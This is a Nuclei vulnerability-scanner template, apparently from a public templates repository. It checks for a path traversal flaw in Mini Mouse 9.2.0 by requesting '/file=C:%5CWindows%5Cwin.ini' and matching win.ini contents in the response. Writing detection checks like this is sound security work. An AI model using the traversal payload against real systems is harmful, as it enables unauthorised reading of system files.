nuclei-templates/vulnerabilities/other/minimouse-lfi.yaml

28 lines
515 B
YAML

id: minimouse-lfi
info:
name: Mini Mouse 9.2.0 - Path Traversal
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/49744
tags: minimouse,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/file=C:%5CWindows%5Cwin.ini"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body